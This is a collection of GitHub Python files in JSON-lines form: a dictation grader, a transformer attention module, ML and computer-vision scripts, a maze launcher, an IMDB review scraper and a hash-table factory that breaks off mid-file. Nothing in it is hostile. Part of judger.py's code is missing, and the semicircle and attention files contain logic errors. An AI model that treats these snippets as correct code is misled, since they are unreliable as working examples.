+{"seq_id":"36115748112","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\nfrom __future__ import print_function\nimport re\nimport os\nimport sys\nimport json\nimport argparse\nimport glob\nimport time\nimport codecs\n\n__version__ = 'v0.0.1'\nglobal codes\ncodes = ['correct', 'wrong', 'typo', 'plenty', 'captial']\n\ndef init():\n with open('data.json') as fd:\n global data\n data = json.load(fd)\n\ndef getWord(tag, ind, direc):\n global data\n if direc == 'horizontal':\n return data[tag]['words'][ind]\n if direc == 'vertical':\n stride = data[tag]['stride']\n row = (len(data[tag]['words'])+stride-1)/stride\n rest = len(data[tag]['words'])%stride\n if rest==0:\n rest = stride\n if ind5 or wd<=3 and len(s)>8:\n return codes[2]\n return codes[1]\n\n\ndef match(t, d, p):\n tot = 0\n cor = 0\n for i, w in enumerate(p):\n tot+=1\n s = getWord(t, i, d)\n if checkOne(w, s)!='wrong':\n cor+=1\n if tot>20: break\n if cor>3:\n return True\n else:\n return False\n\ndef guess(p):\n global data\n for k in data:\n for d in ['horizontal', 'vertical']:\n if match(k, d, p):\n return k, d\n return None, None\n\ndef getAnalysis(w):\n return '//'\n\ndef correct(p, direction = 'auto', test = ''):\n with open(p) as fd:\n lines = fd.readlines()\n lines = filter(lambda x: x!='', map(lambda x: x.decode('utf-8').strip(), lines))\n tag, direc = guess(lines)\n t = test\n d = direction\n if t!='':\n tag = t\n if d!='auto':\n direc = d\n if tag is None or direc is None:\n raise ValueError('cannot determine which test, please choose one.')\n ind = 0\n marks = {c: [] for c in codes}\n for line in lines:\n if ind>=len(data[tag]['words']): break\n ans = getWord(tag, ind, direc)\n sol = re.split(r'[\\s]+', line)[0]\n code = checkOne(sol, ans)\n marks[code].append((sol, ans))\n ind += 1\n ags = [[0], [2,3,4], [1]]\n res = []\n tot = len(data[tag]['words'])\n for ag in ags:\n sum_ = sum([len(marks[codes[a]]) for a in ag])\n res += [sum_, sum_*100./tot]\n res = tuple([p] + res)\n tstamp = time.strftime(r'%Y%m%d%H%M%S', time.localtime(int(time.time())))\n tout = sys.stdout\n rname = '%s-%s-[%s].report'%(tag, direc, tstamp)\n sys.stdout = codecs.open(rname, 'w', 'utf-8')\n print('Testpaper [%s]: correct %d(%.1f%%), almost correct %d(%.1f%%), wrong %d(%.1f%%)'%res)\n for code in codes[1:]:\n print('Err Type [%s]'%code)\n if len(marks[code]):\n for w in marks[code]:\n analysis = getAnalysis(w[1])\n print('\\t[x] %s => %s [√], %s'%(w[0], w[1], analysis))\n else:\n print('\\tNone')\n print('--End of report.')\n sys.stdout.close()\n sys.stdout = tout\n with codecs.open(rname, 'r', 'utf-8') as fd:\n for line in fd.readlines():\n print(line, end='')\n report = {'date': tstamp, 'test': tag, 'direction': direc, 'testpaper': p, 'delta': marks}\n rname = '%s-%s-[%s].json'%(tag, direc, tstamp)\n with open(rname, 'w') as fd:\n json.dump(report, fd, indent = 2)\n return report\n\nif __name__ == \"__main__\":\n init()\n parser = argparse.ArgumentParser('judger.py ', description = 'dictation judger %s'%__version__, version = __version__)\n parser.add_argument('testpaper', type = str, nargs = '+', help = 'testpaper to be judged')\n parser.add_argument('-d', '--direction', choices = ['horizontal', 'vertical', 'auto'], default = 'auto', help = 'choose direction')\n parser.add_argument('-t', '--test', type = str, choices = data.keys() + [''], default = '', help = 'specify a test')\n parser.add_argument('-l', '--list', action = \"store_true\", help = 'list all tests')\n args = parser.parse_args()\n if args.list:\n for i in data:\n print(i)\n exit(0)\n for tp in args.testpaper:\n for ttp in glob.glob(tp):\n correct(ttp, direction = args.direction, test = args.test)\n","repo_name":"Helicopt/DictationProject","sub_path":"judger.py","file_name":"judger.py","file_ext":"py","file_size_in_byte":5752,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"74398220070","text":"import math\n\nimport torch\nfrom torch import nn\n\n\nclass ScaledDotProductAttention(nn.Module):\n\n def __init__(self):\n \"\"\"scaled dot product attention 구현 클래스\"\"\"\n\n super().__init__()\n self.softmax = nn.Softmax(dim=-1)\n\n def forward(self, \n q: torch.Tensor, \n k: torch.Tensor, \n v: torch.Tensor, \n mask: torch.Tensor=None):\n \"\"\"forward 함수\n\n Args:\n q (torch.Tensor(bs, head, len_q, d_k)): query\n k (torch.Tensor(bs, head, len_k, d_k)): key\n v (torch.Tensor(bs, head, len_k, d_v)): value\n mask (torch.Tenso(bs, 1, len_q, len_k)): masking idx\n\n Returns:\n output (torch.Tensor(bs, head, len_q, d_v)): forward 결과값\n \"\"\"\n\n d_k = k.size(dim=-1)\n\n weight = (q @ k.transpose(-1, -2)) / math.sqrt(d_k)\n\n if mask is not None:\n weight.masked_fill(mask==False, -1e12)\n\n scale_weight = self.softmax(weight)\n\n output = scale_weight @ v\n\n return output","repo_name":"GJ98/transformer","sub_path":"transformer/attentions/scaled_dot_product_attention.py","file_name":"scaled_dot_product_attention.py","file_ext":"py","file_size_in_byte":1073,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"71"}
+{"seq_id":"38626244425","text":"# This Source Code Form is subject to the terms of the Mozilla Public\n# License, v. 2.0. If a copy of the MPL was not distributed with this\n# file, You can obtain one at http://mozilla.org/MPL/2.0/.\n\nimport re\nfrom argparse import ArgumentParser\nfrom os import environ\n\nCONFIG_REGEX = re.compile(r\"@(\\w+)@\")\n\nparser = ArgumentParser()\n\nparser.add_argument('input_file', type=str)\nparser.add_argument('output_file', type=str)\n\nargs = parser.parse_args()\n\nwith open(args.input_file, encoding='utf8') as in_file, open(args.output_file, 'w', encoding='utf8') as out_file:\n for line in in_file.readlines():\n start_pos = 0\n while start_pos < len(line):\n match = CONFIG_REGEX.search(line, start_pos)\n if not match:\n break\n value = environ[match.group(1)]\n line = line[:match.start()] + value + line[match.end():]\n start_pos = match.end()\n out_file.write(line)\n","repo_name":"JacobJBublitz/RenderTests","sub_path":"tools/header_config.py","file_name":"header_config.py","file_ext":"py","file_size_in_byte":947,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"}
+{"seq_id":"71071509350","text":"from __future__ import absolute_import, division, print_function\n\nimport matplotlib.pyplot as plt\nimport pandas as pd\nimport seaborn as sns\n\nimport tensorflow as tf\nfrom tensorflow import keras\nfrom tensorflow.keras import layers\n\ndataset = pd.read_pickle('dfTotal.pickle')\n#reset the index\ndataset = dataset.reset_index()\n#keep only a few columns\ncolList = ['isBachelor', 'numInSeason', 'year', 'viewers(millions)']\ndataset = dataset[colList]\n\n\ntrain_dataset = dataset.sample(frac=0.6,random_state=0)\ntest_cv_dataset = dataset.drop(train_dataset.index)\ntest_dataset = test_cv_dataset.sample(frac=0.5, random_state=0)\ncv_dataset = test_cv_dataset.drop(test_dataset.index)\nsns.pairplot(train_dataset[colList], diag_kind=\"kde\")\n\ntrain_stats = train_dataset.describe()\ntrain_stats.pop(\"viewers(millions)\")\ntrain_stats = train_stats.transpose()\ntrain_stats\n\ntrain_labels = train_dataset.pop('viewers(millions)')\ntest_labels = test_dataset.pop('viewers(millions)')\n\ndef norm(x):\n return (x - train_stats['mean']) / train_stats['std']\nnormed_train_data = norm(train_dataset)\nnormed_test_data = norm(test_dataset)\n\ndef build_model():\n model = keras.Sequential([\n layers.Dense(64, activation=tf.nn.relu, input_shape=[len(train_dataset.keys())]),\n layers.Dense(64, activation=tf.nn.relu),\n layers.Dense(1)\n ])\n\n optimizer = tf.keras.optimizers.RMSprop(0.001)\n\n model.compile(loss='mean_squared_error',\n optimizer=optimizer,\n metrics=['mean_absolute_error', 'mean_squared_error'])\n return model\n\nmodel = build_model()\n\n# Display training progress by printing a single dot for each completed epoch\nclass PrintDot(keras.callbacks.Callback):\n def on_epoch_end(self, epoch, logs):\n if epoch % 100 == 0: print('')\n print('.', end='')\n\nEPOCHS = 1000\n# The patience parameter is the amount of epochs to check for improvement\nearly_stop = keras.callbacks.EarlyStopping(monitor='val_loss', patience=10)\nhistory = model.fit(\n normed_train_data, train_labels,\n epochs=EPOCHS, validation_split = 0.2, verbose=0,\n callbacks=[early_stop, PrintDot()])\n\ndef plot_history(history):\n hist = pd.DataFrame(history.history)\n hist['epoch'] = history.epoch\n \n plt.figure()\n plt.xlabel('Epoch')\n plt.ylabel('Mean Square Error [$viewers(millions)^2$]')\n plt.plot(hist['epoch'], hist['mean_squared_error'],\n label='Train Error')\n plt.plot(hist['epoch'], hist['val_mean_squared_error'],\n label = 'Val Error')\n plt.legend()\n plt.show()\n\nplot_history(history)\n\nloss, mae, mse = model.evaluate(normed_test_data, test_labels, verbose=1)\n\nprint(\"Testing set Mean Abs Error: {:5.2f} viewers(millions)\".format(mae))\n\ntest_predictions = model.predict(normed_test_data).flatten()\nplt.figure()\nax = plt.scatter(test_labels, test_predictions)\nplt.xlabel('True Values [viewers(millions)]')\nplt.ylabel('Predictions [viewers(millions)]')\nplt.axis('equal')\nplt.axis('square')\nplt.xlim([0,plt.xlim()[1]])\nplt.ylim([0,plt.ylim()[1]])\nax = plt.plot([-100, 100], [-100, 100])\nplt.figure()\nerror = test_predictions - test_labels\nax1 = plt.hist(error, bins = 25)\nplt.xlabel(\"Prediction Error [viewers(millions)]\")\nplt.ylabel(\"Count\")","repo_name":"jlaw8504/alphaPRAW","sub_path":"debugScript.py","file_name":"debugScript.py","file_ext":"py","file_size_in_byte":3160,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"}
+{"seq_id":"6066164503","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Mar 12 13:34:41 2019\n\nThis program computes the length of a semicircle \nby considering it as a number of straight sections joined together.\n\n@author: shane\n\"\"\"\n#-----------------------------------------------------------------------------#\nimport numpy as np\n\ndef f(x):\n return np.sqrt(np.abs(1-(x*x)))\n#-----------------------------------------------------------------------------#\n\ndef new_length(x, dx, c_y):\n y1 = f(x)\n y2 = f(x + dx)\n new_y = y2 - f(c_y)\n return np.sqrt(((dx)**2)+((y2 - y1)**2))\n#-----------------------------------------------------------------------------#\n\nr = int(input(\"Enter the radius of the semicircle: \"))\nn = int(input(\"Enter number of n sections to compute (accuracy): \"))\n\nc_length = 0\nx = 0\n\ndx = float(r/n)\n\nfor i in range(0,n):\n x = i*dx\n c_y = f(x - dx)\n c_length += new_length(x, dx, c_y)\n c_length += c_length*2\n\nprint(c_length)","repo_name":"Smullle/ComputationalPhysics","sub_path":"Lab6/ep305curve_lengthOdd.py","file_name":"ep305curve_lengthOdd.py","file_ext":"py","file_size_in_byte":963,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"}
+{"seq_id":"8253072543","text":"\nfrom openvino.inference_engine import IENetwork, IECore\nimport cv2\nimport logging as log\nimport numpy as np\nfrom model_module import Model\n\nclass FaceDetection(Model):\n \"\"\"Class for the Face Detection Model.\"\"\"\n\n def __init__(self, model_name, device, threshold):\n \"\"\" Initialise and loads the face detecion model\"\"\"\n\n super(FaceDetection, self).__init__(model_name, device, threshold)\n\n def predict(self, image):\n \"\"\"Performs inference on image and returns list of faces.\"\"\"\n\n width = image.shape[1]\n height = image.shape[0]\n \n image = self.preprocess_input(image)\n assert len(image.shape) == 4, \"Image shape should be [1, c, h, w]\"\n assert image.shape[0] == 1\n assert image.shape[1] == 3\n\n input_dict={self.input_blob:image}\n \n #------async inference ---\n infer_request_handle = self.net.start_async(request_id=0, inputs=input_dict)\n if self.net.requests[0].wait(-1) == 0:\n res = infer_request_handle.outputs[self.output_blob]\n \n # -----sync inference ----\n # res = self.net.infer(input_dict)\n # res = res[self.output_blob]\n \n output_data = res[0][0]\n rois = []\n for _, proposal in enumerate(output_data):\n if proposal[2] > 0.5:\n xmin = np.int(width * proposal[3])\n ymin = np.int(height * proposal[4])\n xmax = np.int(width * proposal[5])\n ymax = np.int(height * proposal[6])\n rois.append([xmin,ymin,xmax,ymax])\n return rois\n\n def preprocess_output(self, image, rois):\n \"\"\"\n Crops first face from image and returns it.\n \n Args:\n image -- the ndarray image.\n rois -- the list of faces detected from inference.\n \n Returns:\n cropped_roi -- cropped face region of interest.\n \"\"\"\n # assert len(rois) != 0, \"No face detected in the frame.\"\n log.info(msg= '{} face/s detected..'.format(len(rois)))\n\n #roi = im[y1:y2, x1:x2]\n cropped_roi = image[rois[0][1]: rois[0][3], rois[0][0]:rois[0][2]]\n\n return cropped_roi\n ","repo_name":"Jarnen/Computer-Pointer-Controller","sub_path":"src/face_detection.py","file_name":"face_detection.py","file_ext":"py","file_size_in_byte":2235,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"}
+{"seq_id":"34370180231","text":"#!/usr/bin/python3\n\nimport subprocess\nimport os.path\nimport os\n\ndef main():\n print(\"*=========================================*\")\n print(\"* MAZE GENERATOR/SOLVER *\")\n print(\"*=========================================*\")\n print()\n\n check_for_binaries()\n\n generate_call, unsolved = get_generation_call()\n solve_call = get_solve_call(unsolved)\n\n subprocess.call(generate_call.split())\n subprocess.call(solve_call.split())\n\n\ndef get_generation_call():\n print(\"How many rows (0 for maximum)?\")\n rows = check_range(0, 100)\n\n print(\"How many cols (0 for maximum)?\")\n cols = check_range(0, 200)\n\n print(\"Select a generation algorithm:\")\n print(\"1) Randomized Prim's\")\n print(\"2) Randomized Depth-First Search\")\n print(\"3) Randomized Kruskal's\")\n generation_alg = check_range(1, 3)\n\n print(\"Would you like to animate maze generation (y/n)?\")\n animate_generation = yes_or_no()\n\n speed = 0\n if animate_generation:\n print(\"Enter animation speed (delay in milliseconds)\")\n speed = check_range(0, 10000);\n\n print(\"Please enter a filename to save the unsolved maze to\")\n filename = get_filename(\"unsolved.txt\")\n\n generators = ['prims', 'dfs', 'kruskals']\n\n generate_call = \"./generator_driver\"\n generate_call += \" --algorithm={}\".format(generators[generation_alg-1])\n generate_call += \" --file={}\".format(filename)\n generate_call += \" --animate\" if animate_generation else \"\"\n generate_call += \" --speed={}\".format(speed if speed > 0 else \"0\")\n generate_call += \" --rows={}\".format(rows) if rows > 0 else \"\"\n generate_call += \" --cols={}\".format(cols) if cols > 0 else \"\"\n\n return generate_call, filename\n\n\ndef get_solve_call(input_file):\n print(\"Select a solving algorithm\")\n print(\"1) Player Controlled\")\n print(\"2) Recursive Backtracking\")\n print(\"3) Breadth-First Search\")\n print(\"4) Depth-First Search\")\n print(\"5) A*\")\n solve_alg = check_range(1, 5)\n\n speed = 0\n if solve_alg != 1:\n print(\"Would you like to animate maze solving (y/n)?\")\n # animate_solve = True if input(\">>>\") == 'y' else False\n animate_solve = yes_or_no()\n if animate_solve:\n print(\"Enter animation speed (delay in milliseconds)\")\n speed = check_range(0, 10000);\n else:\n animate_solve = True\n\n print(\"Please enter a filename to save the solved maze to\")\n output_file = get_filename(\"solved.txt\")\n\n solvers = ['play', 'bt', 'bfs', 'dfs', 'astar']\n\n solve_call = \"./solver_driver\"\n solve_call += \" --algorithm={}\".format(solvers[solve_alg-1])\n solve_call += \" --animate\" if animate_solve else \"\"\n solve_call += \" --speed={}\".format(speed if speed > 0 else \"0\")\n solve_call += \" --infile={}\".format(input_file)\n solve_call += \" --outfile={}\".format(output_file)\n\n return solve_call\n\n\ndef check_range(lower, upper):\n while True:\n val = input(\">>>\")\n if not val:\n return lower\n try:\n val = int(val)\n if (val < lower) or (val > upper):\n raise ValueError()\n return val\n except ValueError:\n error_msg = \"ERROR: Please choose a number\"\n error_msg += \" between {} and {}\".format(lower, upper)\n print(error_msg)\n\n\ndef yes_or_no():\n while True:\n val = input(\">>>\")\n if not val:\n return True\n if val.lower()[0] not in 'yn':\n error_msg = \"ERROR: Please choose [y]es or [n]o \"\n print(error_msg)\n else:\n return val[0] == 'y'\n\n\ndef check_for_binaries():\n generator_exists = os.path.isfile(\"./generator_driver\")\n solver_exists = os.path.isfile(\"./solver_driver\")\n if not (generator_exists and solver_exists):\n print(\"At least one of the necessary binaries does not exist\")\n print(\"Attempt to resolve?\")\n if yes_or_no():\n make_command = \"make > /dev/null\"\n FNULL = open(os.devnull, 'w')\n subprocess.call(make_command.split(), stdout=FNULL, stderr=FNULL)\n\n generator_exists = os.path.isfile(\"./generator_driver\")\n solver_exists = os.path.isfile(\"./solver_driver\")\n if not (generator_exists and solver_exists):\n print(\"Could not resolve. Try running make?\")\n raise Exception(\"Please consult repo owner\")\n else:\n print(\"\\n=== Successfully built binaries ===\\n\")\n\n\ndef get_filename(default):\n val = input(\">>>\")\n if not val:\n return default\n else:\n return val\n\nif __name__ == \"__main__\":\n try:\n main()\n except KeyboardInterrupt:\n print(\"\\rGoodbye!\")\n except Exception as e:\n print(e)\n","repo_name":"ian-howell/Mazes","sub_path":"maze.py","file_name":"maze.py","file_ext":"py","file_size_in_byte":4784,"program_lang":"python","lang":"en","doc_type":"code","stars":15,"dataset":"github-code","pt":"71"}
+{"seq_id":"10752246541","text":"\"\"\"Provides the PropertyTypes class.\"\"\"\n\nfrom datetime import datetime, timedelta\n\nNoneType = type(None)\n\n\nproperty_types = dict(\n null=NoneType,\n bool=bool,\n str=str,\n float=float,\n int=int,\n list=list,\n dict=dict,\n datetime=datetime,\n duration=timedelta\n)\n","repo_name":"chrisnorman7/carehome","sub_path":"carehome/property_types.py","file_name":"property_types.py","file_ext":"py","file_size_in_byte":285,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"}
+{"seq_id":"74840168229","text":"# IMPORTS\n\nimport cv2\nimport numpy as np\nfrom tensorflow.keras.models import load_model\nfrom tensorflow.keras.preprocessing import image\n\n# LOADING THE MODEL\n\nmodel = load_model(\"detection_model.h5\")\n\n\ndef face_extraction(frame):\n \"\"\"Detect faces in a frame and extract them\"\"\"\n\n faces = cascade_model.detectMultiScale(frame, 1.1, 5)\n\n for x, y, w, h in faces:\n cropped_img = frame[y : y + h, x : x + w]\n\n return cropped_img\n\n\ndef image_processing(frame):\n \"\"\"Preprocessing of the image for predictions\"\"\"\n\n frame = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)\n frame = cv2.resize(frame, (48, 48))\n frame = image.img_to_array(frame)\n frame = frame / 255\n frame = np.expand_dims(frame, axis=0)\n\n return frame\n\n\ndef detect_expressions(frame, detection_model):\n \"\"\"Detect final expressions and return the predictions\n done by the detection_model\"\"\"\n\n cropped_frame = face_extraction(frame)\n\n test_frame = image_processing(cropped_frame)\n\n prediction = np.argmax(model.predict(test_frame), axis=-1)\n\n return prediction\n\n\n# LOAD IMAGE\n\nimg = cv2.imread(\"./test_images/Swift2.jpg\")\n\n\n# LOADING HAAR CASCADE CLASSIFIER\n\ncascade_model = cv2.CascadeClassifier(\"haarcascade_frontalface_default.xml\")\nfaces = cascade_model.detectMultiScale(img, 1.1, 10)\n\n\nfont = cv2.FONT_ITALIC\nfor x, y, w, h in faces:\n cv2.rectangle(img, (x, y), (x + w, y + h), (0, 255, 0), 2)\n\n prediction = detect_expressions(img, model)\n\n if prediction == [0]:\n cv2.putText(img, \"Angry\", (x, y), font, 2, (0, 0, 255), 2)\n\n elif prediction == [1]:\n cv2.putText(img, \"Happy\", (x, y), font, 2, (0, 0, 255), 2)\n\n elif prediction == [2]:\n cv2.putText(img, \"Sad\", (x, y), font, 2, (0, 0, 255), 2)\n\n else:\n cv2.putText(img, \"Surprised\", (x, y), font, 2, (0, 0, 255), 2)\n\n cv2.imshow(\"img\", img)\n\n\n# Cleaning\n\ncv2.waitKey(0)\ncv2.destroyAllWindows()\n","repo_name":"Python-World/Python_and_the_Web","sub_path":"Scripts/Miscellaneous/Facial Expressions Detection/detection_on_img.py","file_name":"detection_on_img.py","file_ext":"py","file_size_in_byte":1905,"program_lang":"python","lang":"en","doc_type":"code","stars":666,"dataset":"github-code","pt":"71"}
+{"seq_id":"34859066391","text":"import random\n\ndef simpleStats(a):\n if len(a) == 0:\n return None\n \n mean = sum(a)/len(a)\n\n b = sorted(a)\n if len(a)%2 == 0:\n median = (b[int(len(a)/2)] + b[int(len(a)/2)-1])/2\n else:\n median = b[int(len(a)/2)]\n\n mode = max(set(a), key=a.count)\n return (mean, median, mode)\n\n\ndef test(tests):\n for i in range(tests):\n lst = makeRandomList()\n print(lst, simpleStats(lst))\n\ndef makeRandomList():\n length = random.randint(1, 10)\n lst = []\n\n for i in range(length):\n lst.append(random.randint(0, 100))\n return lst\n\nprint(simpleStats([3,5,8,2,2]))\n\ntest(10)\n","repo_name":"Amithab/Python_Practice","sub_path":"W5/SimpleStats.py","file_name":"SimpleStats.py","file_ext":"py","file_size_in_byte":584,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"}
+{"seq_id":"18357212968","text":"\n# coding: utf-8\n\n# In[10]:\n\n\nimport os \nimport time\nimport csv\nfrom selenium import webdriver \nfrom selenium.webdriver.common.keys import Keys \nfrom selenium.webdriver.chrome.options import Options \n\nchrome_options = Options() \nchrome_options.add_argument(\"--headless\") \nchrome_options.binary_location = 'C:\\Program Files (x86)\\Google\\Chrome\\Application\\chrome.exe' \n\ndriver = webdriver.Chrome(executable_path=os.path.abspath(\"C:\\\\_files\\\\git\\\\DVA-Project\\\\ChromeDriver\\\\chromedriver.exe\"), options=chrome_options) \n#driver = webdriver.Chrome(executable_path=os.path.relpath(\"..\\chromedriver_win32\\chromedriver.exe\"), options=chrome_options) \n\n\n# In[177]:\n\n\ndef get_imdb_reviews(tt):\n# driver.get(\"https://www.imdb.com/title/tt0056592/reviews?ref_=tt_urv\") \n driver.get(\"https://www.imdb.com/title/\"+tt+\"/reviews\")\n click_count = 0\n while True:\n try:\n load_button = driver.find_element_by_id('load-more-trigger')\n load_button.click()\n click_count = click_count + 1\n print(str(click_count))\n time.sleep(.5)\n continue\n except Exception as e: \n print(\"No more found\")\n print(\"Total Clicks: \" + str(click_count))\n break\n \n # Click on all the spoiler warning controls to expand them\n ctls = driver.find_elements_by_css_selector(\"div.spoiler-warning__control\")\n for idx,elem in enumerate(ctls):\n elem.click()\n \n #reviews = driver.find_elements_by_css_selector(\"div.review-container .content .text\")\n reviews = driver.find_elements_by_css_selector(\"div.review-container\")\n \n output = []\n review_clicks = 0\n\n for idx, review in enumerate(reviews):\n review_text = review.find_element_by_css_selector(\".content .text\")\n if 'clickable' in review_text.get_attribute('class'):\n review_text.click()\n review_clicks = review_clicks + 1\n \n link_elem = review.find_elements_by_class_name(\"title\")\n if len(link_elem) > 0:\n link = link_elem[0].get_attribute(\"href\")\n else:\n link = ''\n \n rating = '?'\n try:\n rating = review.find_elements_by_class_name(\"ipl-ratings-bar\")[0].find_elements_by_tag_name(\"span\")[1].text\n except:\n rating = '?'\n\n output.append((link, rating, review_text.text))\n\n return output\n\n\n# In[ ]:\n\n\ninput_file = '.\\\\tmdb_to_imdb_id_mapping2.csv'\n\nline_count = 0\n\n\nwith open(input_file) as csvfile:\n readCSV = csv.reader(csvfile, delimiter=',')\n with open('movie_reviews.csv', mode='w', encoding='utf8', newline='') as review_file:\n review_writer = csv.writer(review_file, delimiter=',', quotechar='\"', quoting=csv.QUOTE_MINIMAL)\n review_writer.writerow(['imdbid', 'reviewid', 'url', 'rating', 'review'])\n for movie in readCSV:\n line_count = line_count + 1\n #Skip header in read\n if line_count == 1:\n continue\n \n #Get the IMDBId\n tt = movie[2]\n if tt == '':\n continue\n\n reviews = get_imdb_reviews(tt)\n for idx, review in enumerate(reviews): \n review_writer.writerow([tt,idx,review[0], review[1], review[2]])\n \n #Wait between movies\n time.sleep(2)\n \n #Hardcoded to only run a few\n # movie_count = 2\n # if line_count > movie_count:\n # break\n\n\n# In[ ]:\n\n\ndriver.close()\n\n","repo_name":"CaptainDylan/Books_Films","sub_path":"Code/Code_For_Dataset/3_MovieDataCollection/ScrapeIMDB.py","file_name":"ScrapeIMDB.py","file_ext":"py","file_size_in_byte":3579,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"}
+{"seq_id":"7525723532","text":"from typing import Dict, Iterable, List, Tuple\n\nimport tensorflow as tf\n\nfrom idl.matrix.proto.example_pb2 import OutConfig\nfrom monolith.native_training import distributed_ps\nfrom monolith.native_training import distributed_ps_sync\nfrom monolith.native_training import entry\nfrom monolith.native_training import hash_filter_ops\nfrom monolith.native_training import hash_table_ops\nfrom monolith.native_training import multi_type_hash_table\nfrom monolith.native_training import multi_hash_table_ops\nimport monolith.native_training.embedding_combiners as embedding_combiners\n\n\nclass MultiHashTableFactory:\n\n def __init__(self, hash_filters, sync_clients):\n self._cc_dict = {}\n self.hash_filters = hash_filters\n self.sync_clients = sync_clients\n\n def __call__(self, idx: int, slot_to_config):\n k = id(slot_to_config)\n cc = self._cc_dict.get(k, None)\n if cc is None:\n cc = multi_hash_table_ops.convert_to_cached_config(slot_to_config)\n self._cc_dict[k] = cc\n return multi_hash_table_ops.MultiHashTable.from_cached_config(\n cc=cc,\n hash_filter=self.hash_filters[idx],\n sync_client=self.sync_clients[idx],\n name_suffix=str(idx))\n\n\ndef create_in_worker_multi_type_hash_table(\n shard_num: int,\n slot_to_config: Dict[str, entry.HashTableConfigInstance],\n hash_filter: tf.Tensor,\n sync_client: tf.Tensor = None,\n queue_configs: Dict[str, int] = None,\n):\n \"\"\"\n Creates a in worker multi-type hash table factory.\n Args:\n shard_num: the number of shards for distributing hash tables.\n \"\"\"\n\n # The logic here is\n # merged_slots -> distributed_fused_multitype_table -> alltoall -> hash_table\n def distributed_multi_type_table_factory(merged_slot_to_config):\n\n def multi_type_table_factory(idx):\n\n def table_factory(name_suffix, config):\n return hash_table_ops.hash_table_from_config(\n config=config,\n hash_filter=hash_filter,\n name_suffix=\"_\".join([name_suffix, str(idx)]),\n sync_client=sync_client)\n\n return multi_type_hash_table.MultiTypeHashTable(merged_slot_to_config,\n table_factory)\n\n return distributed_ps_sync.DistributedMultiTypeHashTableMpi(\n shard_num, multi_type_table_factory, queue_configs)\n\n return multi_type_hash_table.MergedMultiTypeHashTable(\n slot_to_config, distributed_multi_type_table_factory)\n\n\ndef create_multi_type_hash_table(\n num_ps: int,\n slot_to_config: Dict[str, entry.HashTableConfigInstance],\n hash_filters: List[tf.Tensor],\n sync_clients: List[tf.Tensor] = None,\n reduce_network_packets: bool = False,\n max_rpc_deadline_millis: int = 30,\n):\n \"\"\"Create a distributed multi type hash table.\n Args:\n reduce_network_packets - if True, it will compact all tensors locally so ps will get less load.\n Useful when there are a lot of workers.\n \"\"\"\n if num_ps and sync_clients:\n assert num_ps == len(\n sync_clients\n ), \"Number of PS should be equal to number of sync clients, while got {} vs {}\".format(\n num_ps, len(sync_clients))\n if not sync_clients:\n sync_clients = [None] * max(num_ps, 1)\n\n if num_ps == 0:\n\n def factory(name_suffix, config):\n return hash_table_ops.hash_table_from_config(config,\n hash_filter=hash_filters[0],\n name_suffix=name_suffix,\n sync_client=sync_clients[0])\n\n def multi_type_factory(merged_slot_to_config):\n return multi_type_hash_table.MultiTypeHashTable(merged_slot_to_config,\n factory)\n\n return multi_type_hash_table.MergedMultiTypeHashTable(\n slot_to_config, multi_type_factory)\n elif not reduce_network_packets:\n # The logic here is\n # dedup_slots -> multi hash table -> distributed_hash_table -> hash_table\n # | worker | ps |\n def multi_type_factory(merged_slot_to_config):\n\n def distributed_factory(name_suffix, config):\n\n def factory(idx, config_on_ps):\n return hash_table_ops.hash_table_from_config(\n config_on_ps,\n hash_filter=hash_filters[idx],\n name_suffix=\"_\".join([name_suffix, str(idx)]),\n sync_client=sync_clients[idx])\n\n return distributed_ps.DistributedHashTable(num_ps, config, factory)\n\n return multi_type_hash_table.MultiTypeHashTable(merged_slot_to_config,\n distributed_factory)\n\n return multi_type_hash_table.MergedMultiTypeHashTable(\n slot_to_config, multi_type_factory)\n else:\n # The logic here is\n # dedup_slots -> distributed multi hash table -> multi hash table -> hash table\n # | worker | ps |\n def distributed_multi_type_factory(merged_slot_to_config):\n\n def multi_type_factory(idx: int, slot_to_config_on_ps):\n\n def factory(name_suffix, config):\n return hash_table_ops.hash_table_from_config(\n config,\n hash_filter=hash_filters[idx],\n name_suffix=\"_\".join([name_suffix, str(idx)]),\n sync_client=sync_clients[idx])\n\n return multi_type_hash_table.MultiTypeHashTable(slot_to_config_on_ps,\n factory)\n\n return distributed_ps.DistributedMultiTypeHashTable(\n num_ps,\n merged_slot_to_config,\n multi_type_factory,\n max_rpc_deadline_millis=max_rpc_deadline_millis)\n\n return multi_type_hash_table.MergedMultiTypeHashTable(\n slot_to_config, distributed_multi_type_factory)\n\n\ndef create_native_multi_hash_table(\n num_ps: int,\n slot_to_config: Dict[str, entry.HashTableConfigInstance],\n hash_filters: List[tf.Tensor],\n sync_clients: List[tf.Tensor] = None,\n max_rpc_deadline_millis: int = 30,\n):\n \"\"\"Create a distributed native multi hash table.\"\"\"\n if num_ps and sync_clients:\n assert num_ps == len(\n sync_clients\n ), \"Number of PS should be equal to number of sync clients, while got {} vs {}\".format(\n num_ps, len(sync_clients))\n if not sync_clients:\n sync_clients = [None] * max(num_ps, 1)\n\n if num_ps == 0:\n return multi_hash_table_ops.MultiHashTable.from_configs(\n configs=slot_to_config,\n hash_filter=hash_filters[0],\n sync_client=sync_clients[0])\n else:\n # The logic here is\n # slots -> distributed multi hash table -> multi hash table\n # | worker | ps |\n return distributed_ps.DistributedMultiTypeHashTable(\n num_ps,\n slot_to_config,\n MultiHashTableFactory(hash_filters, sync_clients),\n max_rpc_deadline_millis=max_rpc_deadline_millis)\n\n\ndef create_in_worker_native_multi_hash_table(\n shard_num: int,\n slot_to_config: Dict[str, entry.HashTableConfigInstance],\n hash_filter: tf.Tensor,\n sync_client: tf.Tensor = None,\n queue_configs: Dict[str, int] = None,\n):\n # The logic here is\n # 